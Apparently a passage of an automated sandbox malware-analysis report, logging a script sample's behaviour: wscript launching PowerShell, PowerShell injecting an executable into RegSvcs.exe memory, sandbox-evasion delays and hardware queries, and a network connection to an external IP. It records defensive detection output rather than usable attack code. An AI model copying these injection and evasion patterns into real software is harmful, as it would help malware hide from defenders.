                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\System32\wscript.exeDropped file: Do While CBL < 10000 ' Lmite de iteraciones para demostracin WScript.Sleep 10000Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5978Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3880Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 590Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2995Jump to behavior
                  Source: C:\Windows\System32\wscript.exe TID: 7280Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\wscript.exe TID: 7340Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6128Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99859Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99624Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99296Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99187Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99077Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98968Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98856Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98747Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98640Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98421Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98202Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98093Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: wscript.exe, 00000000.00000003.2057998960.000001FE4C765000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2072048956.000001FE4C765000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2108624502.000001FE4C765000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2058319657.000001FE4C765000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2246918851.000001FE4C6F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2247215022.000001FE4C763000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2248955221.000001FE4C6FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2221847721.000001FE4C763000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2209476075.000001FE4C765000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2247215022.000001FE4C6FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2249046009.000001FE4C763000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: RegSvcs.exe, 00000008.00000002.3298797995.0000000006346000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllsion
                  Source: wscript.exe, 00000000.00000003.2246918851.000001FE4C6F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2248955221.000001FE4C6FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2247215022.000001FE4C6FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RA1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 172.67.215.48 443Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1150000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1150000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1152000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 118C000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 118E000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F27008Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "8092" "2736" "2688" "2740" "0" "0" "2744" "0" "0" "0" "0" "0" Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
